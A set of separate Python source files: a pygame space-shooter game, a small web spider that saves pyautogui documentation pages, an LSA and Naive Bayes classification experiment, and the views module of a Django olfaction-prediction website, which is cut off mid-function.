# Author: Gislaine e Izabely
# Created: 09/29/2015
# Copyright: (c) Gislaine e Izabely 2015
# Licence: GIZ
# -------------------------------------------------------------------------------
__author__ = 'Gislaine e Izabely'
pygame.init()
pygame.font.init()
# Window size, and movement limits that keep sprites fully on screen.
WIDTH = 1000
HEIGTH = 600
LIM_WIDTH = WIDTH - 65
LIM_HEIGTH = HEIGTH - 50
WHITE = (255, 255, 255)
FPS = 60
def start_controle_som():
    """Configure the pygame mixer (the Sound return is currently disabled)."""
    pygame.mixer.pre_init(44100, 32, 2, 4096)
    pygame.mixer.init(frequency=22050, size=-16, channels=2, buffer=4096)
    # return pygame.mixer.Sound("MusicNave.wav")
def colisao_naves(nave, inimigos):
    """Return True if the player's area overlaps any enemy's area."""
    area_jogador = nave.get_area()
    return any(area_jogador.colliderect(inimigo.get_area()) for inimigo in inimigos)
def colisao_tiro(nave, inimigos):
    """Check the player's shots against every enemy.

    On the FIRST shot that hits, that shot is flagged (colisao=True,
    ativo=False), the enemy takes damage, and True is returned immediately;
    remaining shots and enemies are not examined this frame. Returns False
    when nothing hit.
    """
    if inimigos:
        for inimigo in inimigos:
            area = inimigo.get_area()
            for tiro in nave.armamento():
                if area.colliderect(tiro.get_area()):
                    tiro.colisao = True
                    tiro.ativo = False
                    inimigo.foi_atingido()
                    return True
    return False
def cria_inimigo(naves_inimigas, num_inimigos):
    """Top up the enemy list with one new ship while below num_inimigos.

    The new ship is added only when it overlaps no existing enemy.
    BUG FIX: the original passed the bound method `inimigo.get_area`
    (missing call parentheses) to colliderect, and appended the new ship
    once per non-colliding enemy, creating duplicates.
    """
    if len(naves_inimigas) < num_inimigos:
        nave_criada = cria_nave_inimigo()
        livre = all(
            not nave_criada.get_area().colliderect(inimigo.get_area())
            for inimigo in naves_inimigas
        )
        if livre:
            naves_inimigas.append(nave_criada)
    return naves_inimigas
def get_evento_saida():
    """Drain the event queue; on a window-close event, quit the program."""
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            pygame.quit()
            sys.exit()
def get_evento_teclado(nave):
    """Move or fire the player's ship based on the currently pressed keys.

    Arrow keys / WASD move in 25-pixel steps within the screen limits;
    space fires.
    """
    tecla = pygame.key.get_pressed()
    if tecla[K_UP] or tecla[K_w]:
        # BUG FIX: the original tested the X coordinate before moving up.
        if nave.get_posicaoy() > 0:
            nave.set_posicaoy(nave.get_posicaoy() - 25)
            nave.start_area()
    elif tecla[K_DOWN] or tecla[K_s]:
        if nave.get_posicaoy() < LIM_HEIGTH:
            # BUG FIX: the original called the misspelled `set_osicaoy`,
            # which raised AttributeError when moving down (cria_nave uses
            # set_posicaoy).
            nave.set_posicaoy(nave.get_posicaoy() + 25)
            nave.start_area()
    elif tecla[K_LEFT] or tecla[K_a]:
        if nave.get_posicaox() > 0:
            nave.set_posicaox(nave.get_posicaox() - 25)
            nave.start_area()
    elif tecla[K_RIGHT] or tecla[K_d]:
        if nave.get_posicaox() < LIM_WIDTH:
            nave.set_posicaox(nave.get_posicaox() + 25)
            nave.start_area()
    elif tecla[K_SPACE]:
        nave.atira()
def run(menu):
    """Menu event loop: keyboard and mouse both drive item selection."""
    relogio = pygame.time.Clock()
    loop_principal = True
    while loop_principal:
        mouse_posicao = pygame.mouse.get_pos()
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                loop_principal = False
                pygame.quit()
            if event.type == pygame.KEYDOWN:
                # Keyboard takes over: hide mouse-driven selection.
                menu.mouse_visivel = False
                menu.set_selecao_teclado(event.key)
            if event.type == pygame.MOUSEBUTTONDOWN:
                # Fire the action bound to the clicked menu item.
                for item in menu.itens:
                    if item.mouse_selecionado(mouse_posicao[0], mouse_posicao[1]):
                        menu.funcoes[item.text]()
        if pygame.mouse.get_rel() != (0, 0):
            # Any mouse motion re-enables mouse-driven selection.
            menu.mouse_visivel = True
            menu.item_atual = None
        menu.set_visibilidade_mouse()
        for item in menu.itens:
            if menu.mouse_visivel:
                menu.set_selecao_mouse(item, mouse_posicao[0], mouse_posicao[1])
            menu.tela.blit(item.label, (item.pos_x, item.pos_y))
        pygame.display.flip()
        relogio.tick(FPS)
def menu_fim():
    """Show the game-over menu: "Novo Jogo" restarts, "Sair" quits."""
    saida = Impressao.Impressao()
    tela = saida.imprime_texto_fim()
    menu_itens = ("Novo Jogo", "Sair")
    funcoes = {"Novo Jogo": jogar, "Sair": sys.exit}
    tam_fonte = 30
    fonte_nome = pygame.font.get_default_font()
    menu = JanelaMenu.JanelaMenu(tela, menu_itens, funcoes, fonte_nome, tam_fonte, WHITE)
    run(menu)
def menu_instrucao():
    """Show the instructions screen with Back / Start options."""
    saida = Impressao.Impressao()
    tela = saida.imprime_instrucao()
    menu_itens = ("Voltar", "Iniciar")
    # BUG FIX: the original stored `menu_inicial()` — calling the function
    # while building the dict (and, with the matching bug in menu_inicial,
    # recursing). Store the function object so it runs only on selection.
    funcs = {"Voltar": menu_inicial, "Iniciar": jogar}
    tam_fonte = 30
    font_name = pygame.font.get_default_font()
    menu = JanelaMenu.JanelaMenu(tela, menu_itens, funcs, font_name, tam_fonte, WHITE)
    run(menu)
def menu_inicial():
    """Show the main menu (Start / Instructions / Quit)."""
    saida = Impressao.Impressao()
    tela = saida.start_tela_menu()
    menu_itens = ("Iniciar Jogo", "Instruções", "Sair")
    # BUG FIX: the original stored `menu_instrucao()` — invoking it while
    # building this dict, causing mutual recursion with the matching bug
    # in menu_instrucao. Store the function object instead.
    funcs = {"Iniciar Jogo": jogar, "Sair": sys.exit, "Instruções": menu_instrucao}
    tam_fonte = 30
    font_name = pygame.font.get_default_font()
    menu = JanelaMenu.JanelaMenu(tela, menu_itens, funcs, font_name, tam_fonte, WHITE)
    run(menu)
def move_tiro(nave):
    """Advance every shot currently fired by the ship."""
    if nave.armamento():
        for projetil in nave.armamento():
            projetil.atira()
def remove_tiro(nave):
    """Drop shots that collided or went inactive.

    BUG FIX: iterate over a snapshot of the weapon list — the original
    removed items from the same sequence it was iterating, which skips
    the element following each removal.
    """
    if nave.armamento():
        for tiro in list(nave.armamento()):
            if tiro.colisao or not tiro.ativo:
                nave.remove_tiro(tiro)
def jogar():
    """Main game loop: spawn enemies, handle input, move and draw everything,
    resolve collisions; once the player collides, show the game-over menu."""
    pygame.init()
    pygame.font.init()
    saida = Impressao.Impressao()
    nave = cria_nave()
    colisao = False
    num_inimigos = 10
    naves_inimigas = []
    relogio = pygame.time.Clock()
    while True:
        get_evento_saida()
        if not colisao:
            naves_inimigas = cria_inimigo(naves_inimigas, num_inimigos)
            get_evento_teclado(nave)
            carregar()
            colisao = colisao_naves(nave, naves_inimigas)
            move_nave_inimiga(naves_inimigas)
            move_tiro(nave)
            # Draw shots, then enemies, then the player's ship.
            for m in nave.armamento():
                saida.telao.blit(m.figura(), (m.get_posicao_x(), m.get_posicao_y()))
            remove_naves_inimigas(naves_inimigas)
            remove_tiro(nave)
            for n in naves_inimigas:
                saida.telao.blit(n.figura(), (n.get_posicao_x(), n.get_posicao_y()))
            saida.telao.blit(nave.figura(), (nave.get_posicao_x(), nave.get_posicao_y()))
            explosao = colisao_tiro(nave, naves_inimigas)
            if explosao:
                remove_tiro(nave)
                remove_naves_inimigas(naves_inimigas)
        else:
            # Player hit an enemy: drop into the game-over menu.
            menu_fim()
        pygame.display.update()
        relogio.tick(FPS)
def toca_musica(som):
    """Play a sound at low (10%) volume."""
    som.set_volume(0.1)
    som.play()
def move_nave_inimiga(naves_inimigas):
    """Advance every enemy ship by one movement step."""
    if naves_inimigas:
        for adversario in naves_inimigas:
            adversario.move()
def remove_naves_inimigas(naves_inimigas):
    """Cull enemies that left the screen or were destroyed.

    BUG FIX: iterate a snapshot — the original called list.remove while
    iterating the same list, skipping the enemy after each removal.
    """
    if naves_inimigas:
        for inimigo in list(naves_inimigas):
            if inimigo.get_posicao_y() > HEIGTH or inimigo.atingido():
                naves_inimigas.remove(inimigo)
def carregar():
    """Construct a fresh Impressao and discard it.

    NOTE(review): presumably Impressao's constructor redraws the screen as
    a side effect — confirm in src.cih.Impressao.
    """
    Impressao.Impressao()
def cria_nave():
    """Build the player's ship, centred horizontally at the bottom limit."""
    nave_escolhida = NaveJogadorBuilder.NaveJogadorBuilder()
    n = Personagem.Personagem.criando_nave(nave_escolhida)
    n.set_posicaox(LIM_WIDTH / 2)
    n.set_posicaoy(LIM_HEIGTH)
    n.start_area()
    return n
def cria_nave_inimigo():
    """Build one enemy ship of a randomly chosen type at a random X, y=0.

    Draw distribution over randint(0, 20): 0-3 Persegue, 4-8 Peao,
    9-11 Perdida, 12-17 Grupo, 18-20 Fuga.
    """
    aleatorio = random.randint(0, 20)
    if 0 <= aleatorio <= 3:
        nave_escolhida = NavePersegueBuilder.NavePersegueBuilder()
    elif 4 <= aleatorio <= 8:
        nave_escolhida = NavePeaoBuilder.NavePeaoBuilder()
    elif 9 <= aleatorio <= 11:
        nave_escolhida = NavePerdidaBuilder.NavePerdidaBuilder()
    elif 10 <= aleatorio <= 17:
        # NOTE(review): 10 and 11 here are unreachable (captured by the
        # branch above); this branch effectively covers 12-17.
        nave_escolhida = NaveGrupoBuilder.NaveGrupoBuilder()
    else:
        nave_escolhida = NaveFugaBuilder.NaveFugaBuilder()
    n = Personagem.Personagem.criando_nave(nave_escolhida)
    # NOTE(review): uses set_posicaoX/Y (capital) while cria_nave uses the
    # lowercase set_posicaox/y — confirm both spellings exist on Personagem.
    n.set_posicaoX(random.randrange(LIM_WIDTH - 20))
    n.set_posicaoY(0)
    n.start_area()
    return n
|
#!/usr/bin/env python3
#coding:utf-8
import requests
from lib import root
from src.search import selenium_
from os import system
# One shared selenium session is created at import time; the two browser
# handles and the Google-search helper are module-level aliases.
selenium_ = selenium_()
browser = selenium_.browser
browser_ = selenium_.browser_
google_search = selenium_.Google_Search
class spider(object):
    """Fetch the top Google results for a query and save each page's HTML
    under {root}lib/doc_image/pyautogui/."""
    def __init__(self):
        self.root = root
    def main(self, keyword):
        """Download the first two result pages for `keyword` as
        pyautogui0.html, pyautogui1.html, ..."""
        results = google_search(keyword=keyword, number=2)
        # FIX: create the directory with os.makedirs instead of shelling
        # out to `mkdir` (portable, no shell parsing of the path, and
        # idempotent across runs).
        import os
        os.makedirs('{}lib/doc_image/pyautogui'.format(self.root), exist_ok=True)
        for i, result in enumerate(results):
            # result[0] is the title (unused), result[1] the URL.
            link = result[1]
            html_doc = requests.get(link).text
            path = '{}lib/doc_image/pyautogui/{}'.format(self.root, 'pyautogui{}.html'.format(str(i)))
            with open(path, 'a+') as w:
                w.write(html_doc)
    def run(self):
        self.main(keyword='site:pyautogui.readthedocs.io')
if __name__ == '__main__':
    # Crawl, then shut down both selenium browser sessions.
    s = spider()
    s.run()
    browser.quit()
    browser_.quit()
|
#!/usr/bin/env python
from final.Database import Database
from final.LSA import LSA
from final.Set import Set
from final.NaiveBayesClassifier import NaiveBayesClassifier
import numpy
###############################################################################
# Initializing
###############################################################################
db = Database()
print("Data imported.")
# n-gram / LSA hyper-parameters: minimum term frequency, maximum n-gram
# length, fraction of eigenvalue mass kept.
MIN_FREQ = 3
MAX_GRAM = 5
P_EIG = 0.95
# Laplace-smoothing values swept for the Naive Bayes classifier.
alpha = [1e-10, 1, 0.5, 0.1, 0.05, 0.01, 0.005]
y = []
y_error_min = []
y_error_max = []
test_score = []
###############################################################################
###############################################################################
# Latent Semantic Analysis
###############################################################################
lsa = LSA(MAX_GRAM, MIN_FREQ, P_EIG)
lsa_results = lsa.process_utterances_through_lsa(db.human_utterances)
print("LSA Results computed.")
###############################################################################
###############################################################################
# Data Division
sets = Set(lsa_results, db.robot_ids, db.human_utterances, n_splits=5)
###############################################################################
###############################################################################
# Naive Bayes Classifier
###############################################################################
for a in alpha:
    print("alpha = ", a)
    for i in range(len(sets.lsa_vectors_train)):
        naive = NaiveBayesClassifier(alpha=a)
        naive.learning_phase(numpy.array(sets.lsa_vectors_train[i]), sets.robot_ids_train[i])
###############################################################################
###############################################################################
# Computing the results of the experiment
###############################################################################
        test_score.append(naive.test_score(numpy.array(sets.lsa_vectors_test[i]), numpy.array(sets.robot_ids_test[i])))
        # NOTE(review): everything below runs once per FOLD, and test_score is
        # never cleared between alpha values, so the running average mixes
        # folds from all previous alphas — confirm whether this is intended.
        avg = numpy.round(numpy.average(numpy.array(test_score)), 2)
        y.append(avg)
        # NOTE(review): min(initial=0) / max(initial=0) clamp the extrema
        # toward 0; for positive scores the reported minimum is always 0.
        min_ = numpy.round(numpy.array(test_score).min(initial=0), 2)
        y_error_min.append(numpy.round(avg - min_, 2))
        max_ = numpy.round(numpy.array(test_score).max(initial=0), 2)
        y_error_max.append(numpy.round(max_ - avg, 2))
        print("Avg test performance: ", avg)
        print(min_)
        print(max_)
        print('\n'*3)
print("y = ", y)
print("yerrormin = ", y_error_min)
print("yerrormax = ", y_error_max)
###############################################################################
|
from uuid import uuid4
from pandas.core.frame import DataFrame
from htmlmin.decorators import minified_response
import datetime
from django.utils import timezone
import pytz
from django.http import request
from django.shortcuts import render, redirect
from django.http import HttpResponse
from django.http import JsonResponse
import pandas as pd
import os
import shutil
from .models import queuedisp, result, disp, disp4, disp2, disp3
from zipfile import ZipFile
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email import encoders
import traceback
import uuid
# Project root captured at import time; views os.chdir back here before file work.
root = os.path.abspath('./')
def get_id(request):
    """Return this session's 10-character id, minting one on first use."""
    if 'id' in request.session:
        return str(request.session['id'])[:10]
    fresh = uuid.uuid4()
    request.session['id'] = str(fresh.int)[:10]
    return str(fresh.int)[:10]
def fastaformat(s):
    """Collapse FASTA lines into one concatenated sequence per record.

    `s` is a list of lines; the first element (a header) is skipped, and
    each subsequent '>' header closes the record accumulated so far.
    """
    sequences = []
    current = ""
    for line in s[1:]:
        if line.startswith(">"):
            sequences.append(current)
            current = ""
        else:
            current = current + line
    sequences.append(current)
    return sequences
def writeresult(a, job_name):
    """Prepend a job header (name, count, model, id) to {job_name}/result.txt.

    The header plus the existing file body is written to a temp file, which
    then replaces result.txt.
    """
    temp = f'{job_name}/temp.txt'
    result = f"{job_name}/result.txt"
    with open(result, 'r') as f:
        with open(temp, 'w') as f2:
            f2.write(f"{a.job_name}\n")
            f2.write(f"{a.count}\n")
            f2.write(f"{a.model}\n")
            f2.write(f"{a.id}\n")
            f2.write(f.read())
    try:
        os.rename(temp, result)
    except OSError:
        # BUG FIX: the original caught WindowsError, which is undefined on
        # non-Windows Python 3 (a NameError if the rename ever failed
        # there). OSError covers the Windows "destination exists" failure
        # portably.
        os.remove(result)
        os.rename(temp, result)
def readresult(user):
    """Rebuild a result record from {user}/result.txt, or None when empty.

    File layout, one value per line: job_name, count, model, id.
    """
    with open(f"{user}/result.txt", 'r') as f:
        record = result()
        record.job_name = f.readline().replace("\n", "")
        if len(record.job_name) == 0:
            return
        record.count = int(f.readline().replace("\n", ""))
        record.model = int(f.readline().replace("\n", ""))
        record.id = (f.readline().replace("\n", ""))
        return record
def check_user(request):
    """Register the session id in session.csv and ensure its work
    directories (m1..m4) and an empty result.txt exist; return the id."""
    os.chdir(root)
    id = str(get_id(request))
    generated = "olfy/static/olfy/generated"
    if os.path.isfile(f"{generated}/session.csv"):
        data = pd.read_csv(f"{generated}/session.csv")
        list1 = list(map(str, list(data["id"])))
        if id not in list1:
            # FIX: DataFrame.append was deprecated in pandas 1.4 and removed
            # in 2.0; concatenate a one-row frame instead.
            new_row = pd.DataFrame(
                {"id": [str(id)], "date": [request.session.get_expiry_date()]})
            data = pd.concat([data, new_row], ignore_index=True)
            data.to_csv(f"{generated}/session.csv", index=False)
    else:
        temp = {"id": [id], "date": [request.session.get_expiry_date()]}
        data = pd.DataFrame(temp)
        data["id"].map(str)
        data.to_csv(f"{generated}/session.csv", index=False)
    if not os.path.isdir(f"{generated}/{id}"):
        os.makedirs(f"{generated}/{id}/m1")
        os.makedirs(f"{generated}/{id}/m2")
        os.makedirs(f"{generated}/{id}/m3")
        os.makedirs(f"{generated}/{id}/m4")
        # Create an empty result file (context manager instead of open/close).
        with open(f"{generated}/{id}/result.txt", 'w'):
            pass
    return id
def loadingpage(request):
    """Render the loading screen; 'hide' presumably toggles a Bootstrap
    d-none class in the template — confirm."""
    os.chdir(root)
    return render(request, "olfy/Ahuja labs website/loading.html", {'hide': 'd-none'})
@minified_response
def home(request):
    """Render the landing page, registering the visitor's session first."""
    check_user(request)
    os.chdir(root)
    context = {
        'hide': 'd-none'
    }
    return render(request, "olfy/Ahuja labs website/index.html", context)
@minified_response
def displaymodels(request):
    """Render the list of available prediction models."""
    check_user(request)
    return render(request, "olfy/Ahuja labs website/modelsList.html")
@minified_response
def about(request):
    """Render the About page with the static team roster."""
    os.chdir(root)
    context = {
        'team': [
            {
                'name': 'Dr. Gaurav Ahuja',
                'post': 'Principal Investigator',
                'email': 'gaurav.ahuja@iiitd.ac.in',
                'image': 'Gaurav.jpg'
            },
            {
                'name': 'Dr. Tripti Mishra',
                'post': 'Intellectual Contribution',
                'email': 'mistripti01@gmail.com',
                'image': 'Tripti.png'
            },
            {
                'name': 'Vishesh Agrawal',
                'post': 'Deep Learning & Interpretability',
                'email': 'vishesh18420@iiitd.ac.in',
                'image': 'Vishesh.png'
            },
            {
                'name': 'Ria Gupta',
                'post': 'Deep Learning & Interpretability',
                'email': 'ria18405@iiitd.ac.in',
                'image': 'Ria.png'
            },
            {
                'name': 'Rishi Raj Jain',
                'post': 'Lead Design & Development',
                'email': 'rishi18304@iiitd.ac.in',
                'image': 'Rishi.jpg'
            },
            {
                'name': 'Sushant Gupta',
                'post': 'Back-End Development ',
                'email': 'sushant19450@iiitd.ac.in',
                'image': 'Sushant.jpg'
            },
            {
                'name': 'Aayushi Mittal',
                'post': 'Data Collection & Design',
                'email': 'aayushim@iiitd.ac.in',
                'image': 'Aayushi.jpg'
            },
            {
                'name': 'Krishan Gupta',
                'post': 'Deep Learning Testing',
                'email': 'krishang@iiitd.ac.in',
                'image': 'Krishan.jpg'
            },
            {
                'name': 'Prakriti Garg',
                'post': 'Testing',
                'email': 'prakriti19439@iiitd.ac.in',
                'image': 'Prakriti.jpg'
            },
            {
                'name': 'Sanjay Kumar Mohanty',
                'post': 'Testing',
                'email': 'sanjaym@iiitd.ac.in',
                'image': 'Sanjay.jpg'
            },
            {
                'name': 'Riya Sogani',
                'post': 'Web Development & Testing',
                'email': 'riya19442@iiitd.ac.in',
                'image': 'Riya.jpg'
            },
            {
                'name': 'Sengupta Labs',
                'post': 'Collaboration',
                'email': 'debarka@iiitd.ac.in',
                'image': 'Sengupta.png'
            }
        ]
    }
    return render(request, "olfy/Ahuja labs website/about.html", context)
@minified_response
def help(request):
    """Render the Help page: input/output format tables and an FAQ.

    NOTE(review): shadows the builtin `help` at module level — harmless for
    a Django view module, but worth knowing when debugging interactively.
    """
    os.chdir(root)
    check_user(request)
    context = {
        'tabledata': [
            {
                'name': 'Odorant Predictor',
                'columnames': 'SMILES',
                'extension': '*.csv'
            },
            {
                'name': 'OR Finder',
                'columnames': 'SMILES',
                'extension': '*.csv'
            },
            {
                'name': 'Odor Finder',
                'columnames': 'Header of FASTA file, Receptor Sequence',
                'extension': '*.csv'
            },
            {
                'name': 'Odorant-OR Pair Analysis',
                'columnames': 'SMILES, Header of FASTA file, Receptor Sequence',
                'extension': '*.csv'
            }
        ],
        'outputData': [
            {
                'name': 'Prediction Probability',
                'extension': 'This is the confidence of the prediction being true'
            },
            {
                'name': 'Receptor Sequence Interpretability',
                'extension': 'A bar graph representation of relevant amino acids in receptor sequence contributing towards the prediction'
            },
            {
                'name': 'SMILES Interpretability (Bar Graph)',
                'extension': 'A bar graph representation of relevant atoms in ligands contributing towards the prediction'
            },
            {
                'name': 'SMILES Interpretability (Structure)',
                'extension': 'Substructure Analysis of the ligand (SMILES) highlighting relevant atoms contributing towards the prediction'
            }
        ],
        'troubleshoot': [
            {
                'ques': 'If I log out of my browser, would my history remain saved?',
                'ans': 'Yes, your history will remain saved up to 7 days, till you choose to clear your cookies in the browser cache.'
            },
            {
                'ques': 'Can I run 2 prediction models from different tabs of the same browser?',
                'ans': 'No.'
            },
            {
                'ques': 'Can I navigate away from the loading screen?',
                'ans': 'We understand that it can be a little time consuming, considering the high computations. Please try to be patient, and do not navigate away from the loading screen to get your results. You could, however, add your email address to receive your results.'
            },
            {
                'ques': 'What if I add more than 25 entries?',
                'ans': 'We only select the first 25 entries as input.'
            },
            {
                'ques': 'The result page shows a table of only ‘NA’ entries. What does this mean?',
                'ans': "Don't worry, NA stands for Not Applicable, which indicates that for the given input, there are no ligands/receptors which can bind to the input receptor/ligand with the given input parameters."
            },
            {
                'ques': 'How do I interpret my results?',
                'ans': 'The results can be interpreted in three ways: based on Receptor Sequence, based on SMILES & based on Structure Based. The colors in the structure and graphs, green and red represent positive and negative contribution towards the binding, respectively.'
            },
            {
                'ques': 'I set the counter value of Top-K to be ‘x’, but I receive ‘y’ output records (y<x)?',
                'ans': "The value of ‘K’ only sets an upper bound of the number of outputs you can get. It is possible to have fewer receptors binding a given input smile than K, or vice versa."
            },
            {
                'ques': 'What does the threshold mean?',
                'ans': "In OR finder, we have used a Tanimoto similarity threshold to find SMILES similar within that threshold. Setting a lower threshold would produce more output records."
            },
            {
                'ques': 'How to set a job title? Can I have special characters in my title?',
                'ans': "Yes, all characters are fit for job titles. We recommend using meaningful job names to keep track of the job. You can see the sample input for more information."
            },
            {
                'ques': 'What is the prediction based on?',
                'ans': "The prediction is based on Deep Learning Models."
            }
        ]
    }
    return render(request, "olfy/Ahuja labs website/help.html", context)
def results(request):
    """Render the stored results for the current session (GET only).

    Reads the session's result.txt header to learn which model produced the
    last job, loads that model's output CSV(s), wraps rows in the display
    helper objects (disp..disp4), and inserts an S.No column on first view.
    NOTE(review): model numbers 1-4 presumably map to Odorant Predictor,
    OR Finder, Odor Finder and Odorant-OR Pair Analysis — confirm; this
    body is largely duplicated in result_queue.
    """
    if request.method == "GET":
        os.chdir(root)
        id = check_user(request)
        user = f"olfy/static/olfy/generated/{id}"
        a = readresult(user)
        if a is None:
            # No stored job for this session.
            return render(request, "olfy/Ahuja labs website/results.html", {"z": False})
        if a.model == 1:
            # Model 1: single CSV with one prediction per SMILES.
            s = f'{user}/m1/{a.job_name}/predicted_output.csv'
            data = pd.read_csv(s)
            data.rename(columns={'smiles': 'SMILES'}, inplace=True)
            number_of_rows = len(data)
            display = []
            for i in range(number_of_rows):
                b = disp()
                b.smiles = data["SMILES"][i]
                b.prob = str(data["prob"][i])[0:5]
                b.sno = i + 1
                temp = data["pred_odor"][i]
                if temp == 1:
                    odor = "Odorant"
                else:
                    odor = "Non-Odorant"
                b.odor = odor
                display.append(b)
            col = [i for i in range(1, len(data) + 1)]
            if "S.No" not in data:
                data.insert(0, 'S.No', col)
                data.to_csv(s, index=False)
            return render(request, "olfy/Ahuja labs website/results.html", {"result": a, "z": True, "display": [{"row": display}], "id": True, "flag": "0"})
        elif a.model == 2:
            # Model 2: one output.csv per input entry (a.count of them).
            display = []
            for i in range(a.count):
                data = pd.read_csv(f'{user}/m2/{a.job_name}/{i+1}/output.csv')
                number_of_rows = len(data)
                temp = {}
                data.rename(columns={'smiles': 'SMILES'}, inplace=True)
                data.rename(
                    columns={'Final_Sequence': 'Sequence'}, inplace=True)
                temp["smiles"] = data["SMILES"][0]
                temp1 = []
                for j in range(number_of_rows):
                    b = disp2()
                    b.sno = j + 1
                    # "Empty" in the Probability column marks a no-match row.
                    if "Empty" == data["Probability"][j]:
                        b.seq = "NA"
                        b.receptorname = "NA"
                        b.prob = "NA"
                        b.noresult = True
                    else:
                        b.seq = data["Sequence"][j]
                        b.receptorname = data["Receptor"][j]
                        b.prob = str(data["Probability"][j])[0:5]
                    b.tableno = i + 1
                    temp1.append(b)
                temp["row"] = temp1
                display.append(temp)
                col = [i for i in range(1, len(data) + 1)]
                if "S.No" not in data:
                    data.insert(0, 'S.No', col)
                    data.to_csv(
                        f'{user}/m2/{a.job_name}/{i+1}/output.csv', index=False)
            return render(request, "olfy/Ahuja labs website/results.html", {"result": a, "z": True, "display": display, "id": True, "flag": "0"})
        elif a.model == 3:
            # Model 3: one output.csv per input receptor (a.count of them).
            display = []
            for i in range(a.count):
                data = pd.read_csv(f'{user}/m3/{a.job_name}/{i+1}/output.csv')
                data.rename(columns={'Smiles': 'SMILES'}, inplace=True)
                data.rename(columns={'seq': 'Sequence'}, inplace=True)
                number_of_rows = len(data)
                temp = {}
                temp["seq"] = (data["header"][0])
                temp1 = []
                for j in range(number_of_rows):
                    b = disp3()
                    b.sno = j + 1
                    if "Empty" == data["Probability"][j]:
                        b.smiles = "NA"
                        b.prob = "NA"
                        b.noresult = True
                    else:
                        b.smiles = data["SMILES"][j]
                        b.prob = str(data["Probability"][j])[0:5]
                    b.tableno = i + 1
                    temp1.append(b)
                temp["row"] = temp1
                display.append(temp)
                col = [i for i in range(1, len(data) + 1)]
                if "S.No" not in data:
                    data.insert(0, 'S.No', col)
                    data.to_csv(
                        f'{user}/m3/{a.job_name}/{i+1}/output.csv', index=False)
            return render(request, "olfy/Ahuja labs website/results.html", {"result": a, "z": True, "display": display, "id": True, "flag": "0"})
        elif a.model == 4:
            # Model 4: single CSV of (SMILES, sequence) pair predictions.
            s = f'{user}/m4/{a.job_name}/output.csv'
            data = pd.read_csv(s)
            data.rename(columns={'seq': 'Sequence'}, inplace=True)
            data.rename(columns={'smiles': 'SMILES'}, inplace=True)
            number_of_rows = len(data)
            display = []
            for i in range(number_of_rows):
                b = disp4()
                b.smiles = data["SMILES"][i]
                b.prob = str(data["prob"][i])[:5]
                if b.prob == "nan":
                    b.prob = "NA"
                b.sno = i + 1
                b.seq = data["Sequence"][i]
                if data["status"][i] == 0:
                    b.status = "Non-Binding"
                elif data['status'][i] == 1:
                    b.status = "Binding"
                else:
                    b.status = data['status'][i]
                display.append(b)
            col = [i for i in range(1, len(data) + 1)]
            if "S.No" not in data:
                data.insert(0, 'S.No', col)
                data.to_csv(s, index=False)
            return render(request, "olfy/Ahuja labs website/results.html", {"result": a, "z": True, "display": [{"row": display}], "id": True, "flag": "0"})
def result_queue(request, job_name, model, count, flag):
    """Render the saved results page for a previously queued job.

    Reads the output CSVs already generated for (job_name, model, count)
    from the requesting user's directory — or from the shared
    "precomputed" directory when flag == "1" — builds display rows for the
    results template, and re-writes each CSV with an S.No column
    prepended if missing.
    """
    if request.method == "GET":
        os.chdir(root)  # all relative paths below assume the project root
        id = check_user(request)
        if flag == "1":
            # flag "1" selects the shared precomputed example results.
            id = "precomputed"
        user = f"olfy/static/olfy/generated/{id}"
        a = result()
        a.job_name = job_name
        a.model = int(model)
        a.count = int(count)
        a.id = id
        if a.model == 1:
            # Model 1: Odorant Predictor — a single CSV for the whole job.
            s = f'{user}/m1/{a.job_name}/predicted_output.csv'
            data = pd.read_csv(s)
            data.rename(columns={'smiles': 'SMILES'}, inplace=True)
            number_of_rows = len(data)
            display = []
            for i in range(number_of_rows):
                b = disp()
                b.smiles = data["SMILES"][i]
                b.prob = str(data["prob"][i])[0:5]  # truncated, not rounded
                b.sno = i + 1
                temp = data["pred_odor"][i]
                if temp == 1:
                    odor = "Odorant"
                else:
                    odor = "Non-Odorant"
                b.odor = odor
                display.append(b)
            # Prepend a serial-number column before re-saving the CSV.
            col = [i for i in range(1, len(data) + 1)]
            if "S.No" not in data:
                data.insert(0, 'S.No', col)
            data.to_csv(s, index=False)
            return render(request, "olfy/Ahuja labs website/results.html", {"result": a, "z": True, "display": [{"row": display}], "id": True, "flag": flag})
        elif a.model == 2:
            # Model 2: OR Finder — one CSV per input SMILES (a.count of them).
            display = []
            for i in range(a.count):
                data = pd.read_csv(f'{user}/m2/{a.job_name}/{i+1}/output.csv')
                number_of_rows = len(data)
                temp = {}
                data.rename(columns={'smiles': 'SMILES'}, inplace=True)
                data.rename(
                    columns={'Final_Sequence': 'Sequence'}, inplace=True)
                temp["smiles"] = data["SMILES"][0]
                temp1 = []
                for j in range(number_of_rows):
                    b = disp2()
                    b.sno = j + 1
                    if "Empty" == data["Probability"][j]:
                        # "Empty" is the no-result sentinel row.
                        b.seq = "NA"
                        b.receptorname = "NA"
                        b.prob = "NA"
                        b.noresult = True
                    else:
                        b.seq = data["Sequence"][j]
                        b.receptorname = data["Receptor"][j]
                        b.prob = str(data["Probability"][j])[0:5]
                    b.tableno = i + 1
                    temp1.append(b)
                temp["row"] = temp1
                display.append(temp)
                col = [i for i in range(1, len(data) + 1)]
                if "S.No" not in data:
                    data.insert(0, 'S.No', col)
                data.to_csv(
                    f'{user}/m2/{a.job_name}/{i+1}/output.csv', index=False)
            return render(request, "olfy/Ahuja labs website/results.html", {"result": a, "z": True, "display": display, "id": True, "flag": flag})
        elif a.model == 3:
            # Model 3: Odor Finder — one CSV per input sequence.
            display = []
            for i in range(a.count):
                data = pd.read_csv(f'{user}/m3/{a.job_name}/{i+1}/output.csv')
                data.rename(columns={'Smiles': 'SMILES'}, inplace=True)
                data.rename(columns={'seq': 'Sequence'}, inplace=True)
                number_of_rows = len(data)
                temp = {}
                temp["seq"] = (data["header"][0])
                temp1 = []
                for j in range(number_of_rows):
                    b = disp3()
                    b.sno = j + 1
                    if "Empty" == data["Probability"][j]:
                        # "Empty" is the no-result sentinel row.
                        b.smiles = "NA"
                        b.prob = "NA"
                        b.noresult = True
                    else:
                        b.smiles = data["SMILES"][j]
                        b.prob = str(data["Probability"][j])[0:5]
                    b.tableno = i + 1
                    temp1.append(b)
                temp["row"] = temp1
                display.append(temp)
                col = [i for i in range(1, len(data) + 1)]
                if "S.No" not in data:
                    data.insert(0, 'S.No', col)
                data.to_csv(
